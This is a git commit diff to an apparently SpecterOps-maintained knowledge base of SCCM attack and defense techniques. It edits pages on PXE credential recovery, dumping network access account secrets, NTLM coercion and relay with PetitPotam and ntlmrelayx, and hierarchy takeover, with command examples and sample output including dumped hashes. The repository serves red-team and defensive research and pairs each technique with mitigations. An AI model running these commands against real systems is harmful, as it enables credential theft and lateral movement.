Finished QA of TAKEOVER-*

This commit is contained in:
Mayyhem
2024-03-08 10:45:54 -05:00
parent ee65772a1e
commit 3be03cf4b2
47 changed files with 1184 additions and 1770 deletions
+22 -2
View File
@@ -22,9 +22,29 @@ This repository serves as a central knowledge base for all known Microsoft Confi
We've curated this repository to raise awareness of the rapidly evolving SCCM threat landscape, drawing inspiration from the [MITRE ATT&CK framework](https://attack.mitre.org/matrices/enterprise/), with a few deviations. We were also strongly influenced by Push Security's [SaaS attack techniques matrix](https://github.com/pushsecurity/saas-attacks/tree/main).
Our approach extends beyond cataloging the tactics of known adversaries to include contributions from the realm of penetration testing, red team operations, and security research. At SpecterOps, we've leveraged many misconfigurations highlighted in this repository in real-world environments, while others represent experimental and exploratory research projects proved out in a lab environment.
Our approach extends beyond cataloging the tactics of known adversaries to include contributions from the realm of penetration testing, red team operations, and security research. At SpecterOps, we've leveraged many misconfigurations highlighted in this repository in real-world environments, while others represent experimental and exploratory research projects proved out in a lab environment.
This project also serves as a central point of reference for all of the [SCCM attack and defense resources](./RESOURCES.md) that we're aware of.
We openly invite you to submit both proven and exploratory SCCM-focused attack techniques and defensive strategies and resources to this project and to provide any feedback and recommendations about the content in this repository.
<hr>
<br>
# How to use this project
Start with the SCCM Attack Matrix and SCCM Attack and Defense Matrix below, which map attack techniques to their MITRE ATT&CK framework tactics, as well as to their detection and prevention strategies.
Offensive security practitioners may also benefit from reviewing the list of known and documented [Attack Techniques](./attack-techniques/_attack-techniques-list.md), which identifies the security context and network access that are required for each technique.
Defenders and IT administrators may benefit from reviewing the list of known and documented [Defense Techniques](./defense-techniques/_defense-techniques-list.md), which identifies the administrator roles we think are most likely to be involved in the implementation of each item.
If you aren't familiar with a term used in a technique's description, refer to the [glossary page](./GLOSSARY.md), which contains definitions for terms commonly used in SCCM.
If you'd like to learn more about SCCM attack and defense, please refer to the [resources page](./RESOURCES.md), which contains links to all the SCCM attack and defense resources that we are aware of, many of which inspired and informed the information in this repository.
If we've overlooked anything or are missing credits for prior work, please reach out to us or submit a pull request and we'd be happy to make updates.
We openly invite you to submit both proven and exploratory SCCM-focused attack techniques and defensive strategies to this project.
<hr>
<br>
+52
View File
@@ -0,0 +1,52 @@
# Offensive and Defensive SCCM Resources
- [Active Directory Spotlight: Attacking The Microsoft Configuration Manager (SCCM/MECM), by Carsten Sandker (@0xcsandker)](https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/)
- [An Inside Look: How to Distribute Credentials Securely in SCCM, by Christopher Panayi](https://www.mwrcybersec.com/an-inside-look-how-to-distribute-credentials-securely-in-sccm)
- [Black Hat USA Arsenal 2022: SharpSCCM, by Chris Thompson (@_Mayyhem) and Duane Michael (@subat0mik)](https://www.youtube.com/watch?v=19F_Io1Tykg)
- [Black Hat USA Arsenal 2023: SharpSCCM - Abusing Microsoft's C2 Framework, by Chris Thompson (@_Mayyhem) and Diego Lomellini (@DiLomSec1)](https://www.youtube.com/watch?v=uyI5rgR0D-s)
- [Black Hat USA SpecterOps Booth 2023: SharpSCCM - Abusing Microsoft's C2 Framework, by Chris Thompson (@_Mayyhem) and Diego Lomellini (@DiLomSec1)](https://www.youtube.com/watch?v=Q8mEMFKscnk)
- [CISA Red Team Report Featuring SCCM, by CISA](https://www.cisa.gov/sites/default/files/2023-03/aa23-059a-cisa_red_team_shares_key_findings_to_improve_monitoring_and_hardening_of_networks_1.pdf)
- [Client Push Installation Abuse, by Matt Nelson (@enigma0x3)](https://twitter.com/enigma0x3/status/962095579068354561?lang=ar-x-fm)
- [CMLoot, by Tomas Rzepka (@1njected)](https://github.com/1njected/CMLoot)
- [cmloot, by Andreas Vikerup and Dan Rosenqvist](https://www.shelltrail.com/research/cmloot/)
- [CMPivot SharpSCCM Support, by Diego Lomellini (@DiLomSec1)](https://github.com/Mayyhem/SharpSCCM/pull/27)
- [Coercing NTLM Authentication from SCCM, by Chris Thompson (@_Mayyhem)](https://medium.com/specter-ops-posts/coercing-ntlm-authentication-from-sccm-e6e23ea8260a)
- [Deobfuscator Implementation in Python by @SkelSec](https://github.com/xpn/sccmwtf/pull/3)
- [Exploring SCCM by Unobfuscating Network Access Accounts, by Adam Chester (@_xpn_)](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
- [Get Secrets via PXE Media Certificates SharpSCCM PR, by Carsten Sandker (@0xcsandker)](https://github.com/Mayyhem/SharpSCCM/pull/28)
- [Grow Your Own SCCM Lab, by @HTTP418](https://http418infosec.com/grow-your-own-sccm-lab)
- [Hierarchy Takeover without SOCKS, by Chris Thompson (@_Mayyhem)](https://twitter.com/_Mayyhem/status/1700602445603209236)
- [impacket SCCM Relay, by Matt Creel (@Tw1sm)](https://github.com/Tw1sm/impacket/tree/feature/sccm-relay)
- [Looting Microsoft Configuration Manager, by Tomas Rzepka (@1njected)](https://labs.withsecure.com/publications/looting-microsoft-configuration-manager)
- [Mimikatz misc::sccm, by Benjamin Delpy (@gentilkiwi)](https://twitter.com/gentilkiwi/status/1392204021461569537?lang=en)
- [Mimikatz dpapi::sccm, by Benjamin Delpy (@gentilkiwi)](https://twitter.com/gentilkiwi/status/1392594113745362946?lang=en)
- [MalSCCM, by Phil Keeble (@The_Keeb)](https://github.com/nettitude/MalSCCM)
- [Offensive Operations with PowerSCCM, by Matt Nelson (@enigma0x3)](https://enigma0x3.net/2016/02/29/offensive-operations-with-powersccm/)
- [Offensive SCCM Summary, by @HTTP418](https://http418infosec.com/offensive-sccm-summary)
- [Owning One to Rule Them All, by Dave Kennedy (@HackingDave) and Dave DeSimone](https://vimeo.com/47978442)
- [PowerSCCM, by Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Jared Atkinson (@jaredcatkinson), and Matt Graeber (@mattifestation)](https://github.com/PowerShellMafia/PowerSCCM)
- [Pulling Passwords Out of Configuration Manager, by Christopher Panayi](https://www.youtube.com/watch?v=Ly9goAud0gs)
- [Push, by Vulnlab](https://www.vulnlab.com/machines)
- [Push Comes to Shove: Exploring SCCM Attack Paths, by Brandon Colley (@TechBrandon)](https://www.youtube.com/watch?v=qLBJJPUGk9U)
- [Push Comes to Shove Part 1, by Brandon Colley (@TechBrandon)](https://www.hub.trimarcsecurity.com/post/push-comes-to-shove-exploring-the-attack-surface-of-sccm-client-push-accounts)
- [Push Comes to Shove Part 2, by Brandon Colley (@TechBrandon)](https://www.hub.trimarcsecurity.com/post/push-comes-to-shove-bypassing-kerberos-authentication-of-sccm-client-push-accounts)
- [PXEThief, by Christopher Panayi](https://github.com/MWR-CyberSec/PXEThief)
- [pxethiefy, by Carsten Sandker (@0xcsandker)](https://github.com/sse-secure-systems/Active-Directory-Spotlights/tree/master/SCCM-MECM/pxethiefy)
- [Red Team Ops SCCM Module, by Zero Point Security (@zeropointsecltd)](https://twitter.com/zeropointsecltd/status/1707385897979654508)
- [Relaying NTLM Authentication from SCCM Clients, by Chris Thompson (@_Mayyhem)](https://medium.com/specter-ops-posts/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
- [SCCM Credential Recovery for Network Access Accounts, by Evan McBroom (@mcbroom_evan)](https://gist.github.com/EvanMcBroom/525d84b86f99c7a4eeb4e3495cffcbf0)
- [SCCM Decrypt POC, by Adam Chester (@_xpn_)](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1)
- [SCCM w/ Garrett Foster (@garrfoster), by Brandon Colley (@TechBrandon) at Trimarc Happy Hour](https://www.youtube.com/watch?v=I5YTH0kQlr8)
- [SCCM Exploitation: The First Cred is the Deepest II, by Gabriel Prud'homme (@vendetce)](https://www.youtube.com/watch?v=W9PC9erm_pI)
- [SCCM/MECM Hacker Recipes, by Charlie Bromberg (@_nwodtuhs)](https://www.thehacker.recipes/a-d/movement/sccm-mecm)
- [SCCM Hierarchy Takeover, by Chris Thompson (@_Mayyhem)](https://posts.specterops.io/sccm-hierarchy-takeover-41929c61e087)
- [SCCM Site Takeover via Automatic Client Push Installation, by Chris Thompson (@_Mayyhem)](https://medium.com/specter-ops-posts/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1)
- [sccmhunter, by Garrett Foster (@garrfoster)](https://github.com/garrettfoster13/sccmhunter)
- [sccmwtf, by Adam Chester (@_xpn_)](https://github.com/xpn/sccmwtf)
- [SharpDPAPI SCCM Credential Gathering Support, by Duane Michael (@subat0mik)](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244)
- [SharpSCCM, by Chris Thompson (@_Mayyhem)](https://github.com/Mayyhem/SharpSCCM)
- [Site Takeover via SCCM's AdminService API, by Garrett Foster (@garrfoster)](https://posts.specterops.io/site-takeover-via-sccms-adminservice-api-d932e22b2bf)
- [Snaplabs SCCM Lab Template, by @an0n_r0](https://twitter.com/an0n_r0/status/1687230842601451522)
- [SQLRecon SCCM Module, by Sanjiv Kawa (@sanjivkawa)](https://github.com/skahwah/SQLRecon)
- [Targeted Workstation Compromise with SCCM, by Matt Nelson (@enigma0x3)](https://enigma0x3.net/2015/10/27/targeted-workstation-compromise-with-sccm/)
- [The Phantom Credentials of SCCM: Why the NAA Won't Die, by Duane Michael (@subat0mik)](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
- [We Have C2 at Home: Leveraging Microsoft's C2 Framework, by Garrett Foster (@garrfoster)](https://www.youtube.com/watch?v=w-9GMz7vD0o&t=6435s)
@@ -40,22 +40,19 @@ This process can be abused because the files and policies can be accessed withou
Once the media file is decrypted, it may contain or be used to obtain credential material in the `NAAConfig` (network access account(NAA)), `TaskSequence`, and `CollectionSettings` (collection variables) policies.
## Impact
Attackers may recover domain credentials from this process, the difficulty of which is a direct function of the complexity of the password set on the PXE media file. If a weak password is set, cracking the password is relatively computionally "easy," depending on the hardware.
With these credentials, attackers may transition from an unauthenticated context on the network to a domain-authenticated context. If any of the credentials recovered are privileged, it may also enable privilege escalation and lateral movement vectors.
## Defensive IDs
- [PREVENT-3: Harden or Disable Network Access Account](../../../defense-techniques/PREVENT/PREVENT-3/prevent-3_description.md)
- [PREVENT-6: Configure strong PXE boot password](../../../defense-techniques/PREVENT/PREVENT-6/prevent-6_description.md)
- [PREVENT-3: Harden or disable network access accounts](../../../defense-techniques/PREVENT/PREVENT-3/prevent-3_description.md)
- [PREVENT-6: Configure a strong PXE boot password](../../../defense-techniques/PREVENT/PREVENT-6/prevent-6_description.md)
- [PREVENT-7: Disable command support in PXE boot configuration](../../../defense-techniques/PREVENT/PREVENT-7/prevent-7_description.md)
- [PREVENT-21: Restrict PXE boot to authorized VLANs](../../../defense-techniques/PREVENT/PREVENT-21/prevent-21_description.md)
## Examples
Using pxethiefy from a Linux machine with network access to retrieve a PXE media file with no password set:
```
testsubject4@sphere4:~$ sudo python3 pxethiefy.py explore -i eth0 -a atlas.aperture.local
@@ -1,7 +1,7 @@
# CRED-2
## Description
Request and deobfuscate machine policy to retrieve credential material
Request machine policy and deobfuscate secrets
## MITRE ATT&CK TTPs
- [TA0006](https://attack.mitre.org/tactics/TA0006/) - Credential Access
@@ -33,18 +33,18 @@ With this domain computer context, the computer can be registered as a client wh
This technique has also been built into [SharpSCCM](https://github.com/Mayyhem/SharpSCCM/wiki/get#get-naa--get-secrets) with the `get secrets` and `get naa` commands.
The `get secrets` command extends this technique to retrieve NAAs, collection variables, and task sequences.
The `get secrets` command extends this technique to retrieve collection variables and task sequences from machine policies, which may also contain secrets such as credentials.
## Impact
In environments using Active Directory defaults, SCCM defaults, and NAAs, any domain-authenticated user may create a computer object, register it as an SCCM client, request the NAA policy, and deobfuscate the credentials.
In environments using Active Directory defaults, SCCM defaults, and NAAs (or collection variables/task sequences containing credentials), any domain-authenticated user may create a computer object, register it as an SCCM client, request the machine policy, and deobfuscate credentials.
If the NAA is implemented under the principle of least privilege, this may not extend the attacker's privilege level in the domain. The more common result: If the NAA is over-privileged, this technique serves as a trivial privilege escalation vector.
If the NAA or credential stored in a collection variable or task sequence is implemented under the principle of least privilege, this may not extend the attacker's privilege level in the domain. The more common result: If the NAA is overprivileged, this technique serves as a trivial privilege escalation vector.
## Defensive IDs
- [PREVENT-3: Harden or Disable Network Access Account](../../../defense-techniques/PREVENT/PREVENT-3/prevent-3_description.md)
- [PREVENT-3: Harden or disable network access accounts](../../../defense-techniques/PREVENT/PREVENT-3/prevent-3_description.md)
- [PREVENT-4: Configure Enhanced HTTP](../../../defense-techniques/PREVENT/PREVENT-4/prevent-4_description.md)
- [PREVENT-10: Principle of Least Privilege](../../../defense-techniques/PREVENT/PREVENT-10/prevent-10_description.md)
- [PREVENT-10: Enforce the principle of least privilege for accounts](../../../defense-techniques/PREVENT/PREVENT-10/prevent-10_description.md)
- [PREVENT-16: Remove SeMachineAccountPrivilege and set MachineAccountQuota to 0 for non-admin accounts](../../../defense-techniques/PREVENT/PREVENT-16/prevent-16_description.md)
## Examples
Using Powermad and SharpSCCM:
@@ -97,7 +97,6 @@ NetworkAccessPassword: <password>
[+] Completed execution in 00:00:05.9045603
```
## References
- Adam Chester, [Unobfuscating Network Access Accounts](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
- Adam Chester, [sccmwtf](https://github.com/xpn/sccmwtf)
@@ -1,34 +1,35 @@
# CRED-3
## Description
Dump currently deployed credentials via WMI
Dump currently deployed secrets via WMI
## MITRE ATT&CK TTPs
- [TA0006](https://attack.mitre.org/tactics/TA0006/) - Credential Access
- [T1555s](https://attack.mitre.org/techniques/T1555/) - Passwords from Password Store
## Requirements
- Local administrative privileges on the SCCM client
- Local administrator privileges on an SCCM client
## Summary
The [network access account](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) (NAA) is a domain account that can be configured on the site server. Clients use the NAA to access and retrieve software from a distribution point but serves no other purpose on the client. The credentials are retrieved by clients as part of the Computer Policy. Once received by the client, the credentials are stored in the `CCM_NetworkAccessAccount` class in the `root\ccm\policy\Machine\ActualConfig` WMI namespace. This can be verified with the following PowerShell one-liner: `Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"`.
The [network access account](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) (NAA) is a domain account that can be configured on the site server. Clients use the NAA to access and retrieve software from a distribution point, but it serves no other purpose on the client. The credentials are retrieved by clients as part of the Computer Policy. Once received by the client, the credentials are stored in the `CCM_NetworkAccessAccount` class in the `root\ccm\policy\Machine\ActualConfig` WMI namespace. This can be verified with the following PowerShell one-liner: `Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"`.
Within this class, there exists two members of interest: `NetworkAccessUsername` and `NetworkAccessPassword`, which contain hexidecimal strings of encrypted data. This data is protected via the Data Protection API (DPAPI) and the SYSTEM DPAPI masterkey. Therefore, we must be elevated on the host in order to retrieve the SYSTEM masterkey which can then be used to decrypt the secrets. This technique applies only to currently-configured NAAs.
This process is automated in [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI?tab=readme-ov-file#sccm) and [SharpSCCM](https://github.com/Mayyhem/SharpSCCM).
A successful decryption result of `00 00 0E 0E 0E 0E...` indicates that the Site Server is configured for NAA but the client is instructed to use its [machine account](https://twitter.com/subat0mik/status/1582387536147582976?s=20).
A successful decryption result of `00 00 0E 0E 0E 0E...` indicates that the site server is configured to instruct the client to use its [machine account](https://twitter.com/subat0mik/status/1582387536147582976?s=20) for the NAA.
The SharpSCCM `local secrets -m wmi` command extends this technique to retrieve collection variables and task sequences via WMI, which may also contain secrets such as credentials.
## Impact
This technique may allow an attacker to retrieve plaintext domain credentials. Even if the NAA or credential stored in a collection variable or task sequence is not overprivileged, domain credentials may be useful for attackers where explicit credentials are required, such as proxying tooling into an environment over command and control (C2). If the credential is overprivileged, this technique may enable lateral movement to other clients and/or sensitive systems.
This technique may allow an attacker to retrieve plaintext domain credentials. Even if the NAA is not over-privileged, domain credentials may be useful for attackers where explicit credentials are required, such as proxying tooling into an environment over command and control (C2). If the NAA is overprivileged, this technique enables lateral movement to other clients and/or sensitive systems.
We (SpecterOps) commonly see accounts that are members of the `SCCM Administrators` and `Domain Admins` groups configured as the NAA.
At SpecterOps, we commonly see accounts that are members of the SCCM `Full Administrator` role and the `Domain Admins` group configured as NAAs.
## Defensive IDs
- [PREVENT-3: Harden or Disable Network Access Account](../../../defense-techniques/PREVENT/PREVENT-3/prevent-3_description.md)
- [PREVENT-3: Harden or disable network access accounts](../../../defense-techniques/PREVENT/PREVENT-3/prevent-3_description.md)
- [PREVENT-4: Configure Enhanced HTTP](../../../defense-techniques/PREVENT/PREVENT-4/prevent-4_description.md)
- [PREVENT-10: Principle of Least Privilege](../../../defense-techniques/PREVENT/PREVENT-10/prevent-10_description.md)
- [PREVENT-10: Enforce the principle of least privilege for accounts](../../../defense-techniques/PREVENT/PREVENT-10/prevent-10_description.md)
## Examples
@@ -126,8 +127,8 @@ SharpDPAPI completed in 00:00:00.0397643
```
## References
- Duane Michael, The Phantom Credentials of SCCM: Why the NAA Wont Die, https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9
- Chris Thompson, SharpSCCCM, https://github.com/Mayyhem/SharpSCCM
- Will Schroeder, SharpDPAPI, https://github.com/GhostPack/SharpDPAPI
- Duane Michael, X, https://twitter.com/subat0mik/status/1582387536147582976?s=20
- Benjamin Delpy, X, https://twitter.com/gentilkiwi/status/1392594113745362946
- Duane Michael, [The Phantom Credentials of SCCM: Why the NAA Wont Die](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
- Chris Thompson, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM)
- Will Schroeder, [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)
- Duane Michael, https://twitter.com/subat0mik/status/1582387536147582976
- Benjamin Delpy, https://twitter.com/gentilkiwi/status/1392594113745362946
@@ -1,7 +1,7 @@
# CRED-4
## Description
Retrieve legacy credentials from the CIM Repository
Retrieve legacy secrets from the CIM repository
## MITRE ATT&CK TTPs
- [TA0006](https://attack.mitre.org/tactics/TA0006/) - Credential Access
@@ -21,7 +21,6 @@ The credentials exist in the file in the following format: `CCM_NetworkAccessAcc
If an encrypted blob exists, it can be extracted and decrypted using the SYSTEM DPAPI masterkey and [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI), or this process can be automated with [SharpSCCM](https://github.com/Mayyhem/SharpSCCM)'s `local secrets -m disk` command, which extends this technique to retrieve collection variables and task sequences that may also contain secrets such as credentials.
## Impact
This technique may allow an attacker to retrieve plaintext domain credentials. Even if the NAA or credential stored in a collection variable or task sequence is not overprivileged, domain credentials may be useful for attackers where explicit credentials are required, such as proxying tooling into an environment over command and control (C2). If the credential is overprivileged, this technique may enable lateral movement to other clients and/or sensitive systems.
@@ -33,22 +33,21 @@ NTLM relay site server to SMB on site systems
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
## Summary
SCCM uses the site system installation account to install and maintain roles on new or existing site system servers. By default, this account is the site server's domain compuper account and requires [local administrative permissions](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#site-system-installation-account) for and network access to the target systems. An attacker could coerce NTLM authentication from the site server's domain computer account and relay it to SMB on remote site systems in the same site to move laterally and elevate privileges.
SCCM uses the site system installation account to install and maintain roles on new or existing site system servers. By default, this account is the site server's domain compuper account and requires [local administrator permissions](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#site-system-installation-account) for and network access to the target systems. An attacker could coerce NTLM authentication from the site server's domain computer account and relay it to SMB on remote site systems in the same site to move laterally and elevate privileges.
## Impact
Impact for these scenarios is difficult to quantify. In some cases a compromised site system role could lead to hierarchy takeover, while in others a successful attack is simply a lateral movement opportunity.
## Defensive IDs
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
## Subtechniques
- ELEVATE-1.1: NTLM relay primary site server SMB to SMB on remote site systems
- ELEVATE-1.2: NTLM relay passive site server SMB to SMB on remote site systems
## Defensive IDs
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
## Examples
1. On the attacker host, identify and profile SCCM assets with `SCCMhunter`. The output below is snipped from the output of the SMB module. From the results, *SCCM.INTERNAL.LAB* is identified as a site server in the *LAB* site with multiple hosts from the same site hosting various site system roles.
1. On the attacker host, identify and profile SCCM assets with `SCCMhunter`. The output below is snipped from the output of the SMB module. From the results, *SCCM.INTERNAL.LAB* is identified as a site server in the *LAB* site with multiple hosts from the same site hosting various site system roles:
```
[21:33:30] INFO [+] Finished profiling all discovered computers.
@@ -81,7 +80,7 @@ Impact for these scenarios is difficult to quantify. In some cases a compromised
+-----------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
```
2. Start `ntlmrelayx` targeting all of the discovered *LAB* site systems. For this example, no additional flags are provided and the tool will simply attempt to dump hashes on the target system.
2. Start `ntlmrelayx`, targeting all of the discovered *LAB* site systems. For this example, no additional flags are provided and the tool will simply attempt to dump hashes on the target system:
```
└─# ntlmrelayx.py -tf sccm_lab_targets.txt -smb2support
@@ -105,9 +104,9 @@ Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Setting up RAW Server on port 6666
```
3. Coerce authentication from the target site server to the attacker host's IP address.
3. Coerce authentication from the target site server to the attacker host's IP address:
```
└─# python3 PetitPotam.py -u lowpriv -p 10.10.100.136 10.10.100.9 -d internal.lab
└─# python3 PetitPotam.py -u lowpriv -p x 10.10.100.136 10.10.100.9 -d internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.100.9[\PIPE\lsarpc]
@@ -123,7 +122,7 @@ Trying pipe lsarpc
```
4. Authentication is captured and relayed in the context of the *SCCM.INTERNAL.LAB* site sever and SAM hashes recovered from the target systems
4. Authentication is captured and relayed in the context of the *SCCM.INTERNAL.LAB* site sever and SAM hashes recovered from the target systems:
```
[*] Servers started, waiting for connections
[*] Received connection from LAB/SCCM$ at SCCM, connection will be relayed after re-authentication
@@ -173,5 +172,5 @@ WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6d27d961da4a806f274e042f
## References
- Microsoft, Install site system roles for Configuration Manager, https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/install-site-system-roles
- Microsoft, Site system installation account, https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#site-system-installation-account
- Microsoft, [Install site system roles for Configuration Manager](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/install-site-system-roles)
- Microsoft, [Site system installation account](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#site-system-installation-account)
@@ -52,9 +52,7 @@ If all configured accounts fail when the site server tries to authenticate to a
- [PREVENT-11: Disable/uninstall WebClient on site servers](../../../defense-techniques/PREVENT/PREVENT-11/prevent-11_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
## Examples
It is not possible to identify whether automatic site-wide client push installation, automatic site assignment, and `Allow connection fallback to NTLM` are enabled without attempting this attack.
1. On the attacker relay server, start `ntlmrelayx`, targeting the IP address of the relay target and the SMB service:
@@ -20,14 +20,13 @@ An attacker could use this technique to deploy an application on a remote client
New applications can also be hidden from being displayed in the Configuration Manager Console software, making them more difficult to detect.
## Subtechniques
- EXEC-1.1 - Deploy binary or script from share
- EXEC-1.2 - Deploy as user to relay NTLM authentication
## Defensive IDs
- [DETECT-4: Monitor application deployment logs in the site's Audit Status Messages](../../../defense-techniques/DETECT/DETECT-4/detect-4_description.md)
- [PREVENT-9: Enforce MFA for SMS Provider calls](../../../defense-techniques/PREVENT/PREVENT-9/prevent-9_description.md)
## Subtechniques
- EXEC-1.1 - Deploy binary or script from share
- EXEC-1.2 - Deploy as user to relay NTLM authentication
## Examples
@@ -1,4 +1,5 @@
# EXEC-2
## Description
PowerShell script execution
@@ -61,7 +61,6 @@ At SpecterOps, we frequently observe predictable naming conventions in use to he
- "sccm site servers" for a security group that contained all SCCM site systems in the domain
- "SCCMDP1" for a SCCM site system configured with the distribution point role
## Impact
1. Identifying the presence of site servers and site systems is typically the first step in building potential attack paths
2. A resolved MP site system role can be abused to spoof SCCM client enrollment and potentially recover credentials ([CRED-2](../../CRED/CRED-2/cred-2_description.md))
@@ -12,6 +12,12 @@ Enumerate SCCM roles via SMB
## Summary
When certain site system roles are installed, part of the installation process involves configuring file shares on the host system. These shares contain detailed descriptions and unique naming conventions that may disclose what site they're deployed in and what roles are installed. Reviewing shares on potential site systems contributes to attack path discovery.
## Impact
1. Profiling site system roles is a supplementary step in building potential attack paths.
2. A resolved DP role can be a target for PXE abuse to recover domain credentials detailed in [CRED-1](../../CRED/CRED-1/cred-1_description.md).
3. A resolved DP role can be a target for [sensitive information hunting in the Content Library](https://rzec.se/blog/looting-microsoft-configuration-manager).
4. A resolved WSUS role can be a target for lateral movement or privilege escalation detailed in [ELEVATE-1](../../ELEVATE/ELEVATE-1/ELEVATE-1_description.md)
## Defensive IDs
-
@@ -75,12 +81,6 @@ WsusContent A network share to be used by Local Publishing to place p
WSUSTemp A network share used by Local Publishing from a Remote WSUS Console Instance.
```
## Impact
1. Profiling site system roles is a supplementary step in building potential attack paths.
2. A resolved DP role can be a target for PXE abuse to recover domain credentials detailed in [CRED-1](../../CRED/CRED-1/cred-1_description.md).
3. A resolved DP role can be a target for [sensitive information hunting in the Content Library](https://rzec.se/blog/looting-microsoft-configuration-manager).
4. A resolved WSUS role can be a target for lateral movement or privilege escalation detailed in [ELEVATE-1](../../ELEVATE/ELEVATE-1/ELEVATE-1_description.md)
## References
- Garrett Foster, [SCCMHunter](https://github.com/garrettfoster13/sccmhunter)
- Tomas Rzepka, [Looting Microsoft Configuration Manager](https://rzec.se/blog/looting-microsoft-configuration-manager/)
@@ -12,6 +12,11 @@ Enumerate SCCM roles via HTTP
## Summary
When certain site system roles are installed, part of the installation process involves configuring web services on the host system. Depending on the role, static and predictable URLs can be enumerated, and when a request is sent to the URL, it provides an expected response. Fuzzing these URLS on potential site systems contributes to attack path discovery.
## Impact
1. Profiling site system roles is a supplementary step in building potential attack paths
2. A resolved MP role can be a target for spoofing client enrollment [CRED-2](../../CRED/CRED-2/cred-2_description.md)
3. A resolved SMS Provider role can be a target for hierarchy takeover ([TAKEOVER-5](../../TAKEOVER/TAKEOVER-5/takeover-5_description.md) and [TAKEOVER-6](../../TAKEOVER/TAKEOVER-6/takeover-6_description.md)).
## Defensive IDs
-
@@ -46,11 +51,6 @@ https://<SMSProvier.FQDN>/AdminService/wmi/
https://<SMSProvier.FQDN>/AdminService/v1.0/
```
## Impact
1. Profiling site system roles is a supplementary step in building potential attack paths
2. A resolved MP role can be a target for spoofing client enrollment [CRED-2](../../CRED/CRED-2/cred-2_description.md)
3. A resolved SMS Provider role can be a target for hierarchy takeover ([TAKEOVER-5](../../TAKEOVER/TAKEOVER-5/takeover-5_description.md) and [TAKEOVER-6](../../TAKEOVER/TAKEOVER-6/takeover-6_description.md)).
## References
- Garrett Foster, [SCCMHunter](https://github.com/garrettfoster13/sccmhunter)
- Microsoft, [What is the administration service in Configuration Manager?](https://learn.microsoft.com/en-us/mem/configmgr/develop/adminservice/overview)
@@ -26,14 +26,15 @@ Attributes that clients periodically report to their management point can be que
Attackers can assume that these users either have an active session or may log onto these systems again, in which case stored credentials in memory could be used to conduct further actions in the context of that user. For example, they could identify devices where a member of the `Domain Admins` group is the primary user or the last to log on and move laterally to the system or coerce NTLM authentication to compromise their account (EXEC-1).
## Defensive IDs
-
## Subtechniques
- RECON-5.1 - User device affinity
- RECON-5.2 - LastLogon
## Defensive IDs
-
## Examples
### RECON-5.1
To find computers where the user `MAYYHEM\sccmadmin` has user device affinity, execute:
@@ -1,4 +1,5 @@
# TAKEOVER-1
## Description
Hierarchy takeover via NTLM coercion and relay to MSSQL on remote site database
@@ -26,23 +27,17 @@ Hierarchy takeover via NTLM coercion and relay to MSSQL on remote site database
### Relay
- Connectivity from the relay server to MSSQL (TCP/1433) on the relay target, the site database
- Extended protection for authentication not required on the site database
- Relay target settings:
- `RequireSecuritySignature` = `0` or not present
- `RestrictReceivingNTLMTraffic` = `0` or not present
- Coercion target is local admin (to access RPC/admin shares)
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
## Summary
By default, the Active Directory domain computer accounts for primary site servers, systems hosting the SMS Provider role, CAS site servers, and passive site servers are granted the `db_owner` role in their respective site's MSSQL database. An attacker who is able to successfully coerce NTLM authentication from one of these accounts and relay it to the site database can use these permissions to grant an arbitrary domain account the SCCM "Full Administrator" role.
By default, the Active Directory domain computer accounts for primary site servers (including CAS site servers), systems hosting the SMS Provider role, and passive site servers are granted the `db_owner` role in their respective site's MSSQL database. An attacker who is able to successfully coerce NTLM authentication from one of these accounts and relay it to the site database can use these permissions to grant an arbitrary domain account the SCCM "Full Administrator" role.
## Impact
